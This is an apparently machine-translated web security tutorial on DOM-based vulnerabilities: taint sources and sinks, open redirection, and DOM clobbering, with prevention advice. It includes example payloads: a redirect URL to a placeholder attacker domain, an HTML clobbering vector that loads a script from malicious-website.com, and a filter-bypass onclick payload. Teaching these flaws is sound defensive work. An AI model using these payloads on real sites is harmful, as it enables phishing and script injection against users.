DOM based vulnerabilities for Web Security

Time:2021-7-25

DOM-based vulnerabilities

In this section, we will describe what isDOM, explain yesDOMHow does the unsafe handling of data introduce vulnerabilities, and suggestions on how to preventDOMLoopholes.

What is DOM

Document Object Model(DOM)Document object model is the hierarchical representation of elements on a page by web browser. Websites can be manipulated using JavaScriptDOMNodes and objects, and their properties.DOMOperation itself is not a problem. In fact, it is also an indispensable part of modern websites. However, JavaScript that processes data unsafe can trigger various attacks. When a web site contains JavaScript that accepts a value that an attacker can control (called a source source) and passes it to a dangerous function (called a sink), aDOMLoopholes.

Pollution flow vulnerability

Many basedDOMThe vulnerability can be traced back to problems in client code processing data that an attacker can control.

What is pollution flow

To exploit or mitigate these vulnerabilities, you must first be familiar withsourceSource andsinkThe basic concept of pollution flow between receivers.

Source is a JavaScript attribute that accepts data that may be controlled by an attacker. An example of a source islocation.searchProperty because it reads input from the query string, which is easier for an attacker to control. In short, any attribute that an attacker can control is a potential source. Include reference URL(document.referrer), user’s Cookies(document.cookie)And web messages.

Sink receivers are potentially dangerous JavaScript functions or DOM objects. If the data controlled by the attacker is passed to them, it may lead to adverse consequences. For example,eval()A function is asinkBecause it executes the parameters passed to it directly as JavaScript. An example of an HTML sink isdocument.body.innerHTMLBecause it could allow an attacker to inject malicious HTML and execute arbitrary JavaScript.

Basically, when a website takes data fromsourceSource passed tosinkA DOM based vulnerability occurs when the receiver then processes data in an insecure manner in the context of a client session.

Most commonsourceThe source is the URL, which can be accessed throughlocationObject access. An attacker can build a link to allow the victim to access the vulnerable page and in the URLqueryString andfragmentPartially add the payload. Consider the following codes:

goto = location.hash.slice(1)
if(goto.startsWith('https:')) {
  location = goto;
}

This is a DOM based open redirection vulnerability becauselocation.hashThe source is handled in an unsafe manner. This code means that if the URLfragmentPartiallyhttpsFirst, extract the currentlocation.hashAnd set towindowYeslocation。 An attacker can construct the following URL to exploit this vulnerability:

https://www.innocent-website.com/example#https://www.evil-user.net

When the victim accesses this URL, JavaScript willlocationSet towww.evil-user.net, that is, it automatically jumps to the malicious website. This vulnerability is very easy to be used for phishing attacks.

Common source

The following are some common methods that can be used for various pollution flow vulnerabilitiessourceSource:

document.URL
document.documentURI
document.URLUnencoded
document.baseURI
location
document.cookie
document.referrer
window.name
history.pushState
history.replaceState
localStorage
sessionStorage
IndexedDB (mozIndexedDB, webkitIndexedDB, msIndexedDB)
Database

The following data can also be used as an indicator of pollution flow vulnerabilitiessourceSource:

  • Reflected dataReflection data
  • Stored dataStore data
  • Web messages

Which sink sinks can lead to DOM based vulnerabilities

The following list provides a quick overview of common DOM based vulnerabilities and provides the reasons for each vulnerabilitysinkExample. For details on each vulnerability, please refer to the relevant section of this series of articles.

DOM based vulnerabilities Sink example
DOM XSS document.write()
Open redirection window.location
Cookie manipulation document.cookie
JavaScript injection eval()
Document-domain manipulation document.domain
WebSocket-URL poisoning WebSocket()
Link manipulation someElement.src
Web-message manipulation postMessage()
Ajax request-header manipulation setRequestHeader()
Local file-path manipulation FileReader.readAsText()
Client-side SQL injection ExecuteSql()
HTML5-storage manipulation sessionStorage.setItem()
Client-side XPath injection document.evaluate()
Client-side JSON injection JSON.parse()
DOM-data manipulation someElement.setAttribute()
Denial of service RegExp()

How to prevent DOM based pollution flow vulnerability

No single operation can completely eliminate theDOMThe threat of attack. However, in general, avoid based onDOMThe most effective way to avoid allowing vulnerabilities from any untrustedsourceData dynamic changes from the source are transferred to anysinkThe value of the receiver.

If the functionality required by the application means that this behavior is inevitable, defensive measures must be implemented within the client code. In many cases, relevant data can be verified according to the white list, and only known secure content is allowed. In other cases, it is necessary to clean up or encode the data. This can be a complex task, and depending on the context in which the data is to be inserted, it may require JavaScript escape, HTML encoding, and URL encoding in the appropriate order.

For measures to prevent specific vulnerabilities, refer to the corresponding vulnerability page linked to the table above.

DOM clobbering

DOM clobbering is an advanced technology. Specifically, you can inject HTML into the page to operate the DOM and finally change the behavior of JavaScript on the website. The most common form of DOM clobbering is to use the anchor element to override the global variable, and then the variable will be used by the application in an unsafe way, such as generating a dynamic script URL.


DOM clobbering

In this section, we will describe what DOM clobbing is, demonstrate how to use clobbing technology to exploit DOM vulnerabilities, and propose methods to prevent DOM clobbing attacks.

What is DOM clobbering

DOM clobbering is a technology that injects HTML into a page to manipulate the DOM and eventually change the behavior of JavaScript on the page. DOM clobbering is particularly useful when XSS is not available, but you can control HTML whitelist attributes on the page, such as ID or name. The most common form of DOM clobbering is to use the anchor element to override the global variable, and then the variable will be used by the application in an unsafe way, such as generating a dynamic script URL.

The term clobbing comes from the fact that you are “clobbing” a global variable or object attribute and overwriting it with a DOM node or HTML collection. For example, you can use DOM objects to override other JavaScript objects and use unsafe names such as submit to interfere with the form’s real submit () function.

How to exploit DOM clobbering vulnerability

Some JavaScript developers often use the following modes:

var someObject = window.someObject || {};

If you can control some HTML on the page, you can break someobject and reference a DOM node, such as anchor. Consider the following codes:

<script>
 window.onload = function(){
    let someObject = window.someObject || {};
    let script = document.createElement('script');
    script.src = someObject.url;
    document.body.appendChild(script);
 };
</script>

To take advantage of this vulnerable code, you can inject the following HTML to destroy someobject referencing an anchor element:

<a id=someObject><a id=someObject name=url href=//malicious-website.com/malicious.js>

Because two identical IDs are used, the DOM will group them into a collection, and then the DOM destruction vector will use this collection to override the someobject reference. The name attribute is used on the last anchor element to break the URL attribute of the someobject object object and point to an external script.

Another common method is to use form elements and input elements to break DOM attributes. For example, break the attributes attribute so that you can pass the relevant client filter. Although the filter will enumerate the attributes attribute, it will not actually delete any attribute because it has been destroyed by the DOM node. As a result, you will be able to inject malicious properties that are usually filtered out. For example, consider the following injection:

<form onclick=alert(1)><input id=attributes>Click me

In this case, the client filter will traverse the DOM and encounter a whitelisted form element. Normally, the filter will loop through the attributes attribute of the form element and delete all blacklisted attributes. However, since the attributes attribute has been destroyed by the input element, the filter will traverse the input element instead. Because the length of the input element is uncertain, the condition of the filter for loop (for example, I < element. Attributes. Length) is not satisfied, and the filter will move to the next element. This will cause the onclick event to be ignored by the filter, which will invoke the alert () method in the browser.

How to defend against DOM clobbering attacks

In short, you can defend against DOM clobbering attacks by checking to ensure that objects or functions meet your expectations. For example, you can check whether the attribute of a DOM node is an instance of NamedNodeMap to ensure that the attribute is an attributes attribute rather than a broken HTML element.

You should also avoid global variables and or operators||As this may lead to DOM clobbering vulnerability.

In summary:

  • Check whether the object and function are legal. If you are filtering the DOM, make sure that the object or function you are checking is not a DOM node.
  • Avoid bad code patterns. Avoid using global variables with logical or operators.
  • Using well tested libraries, such as dompurify library, can also solve the problem of DOM clobbering vulnerability.

DOM based vulnerabilities for Web Security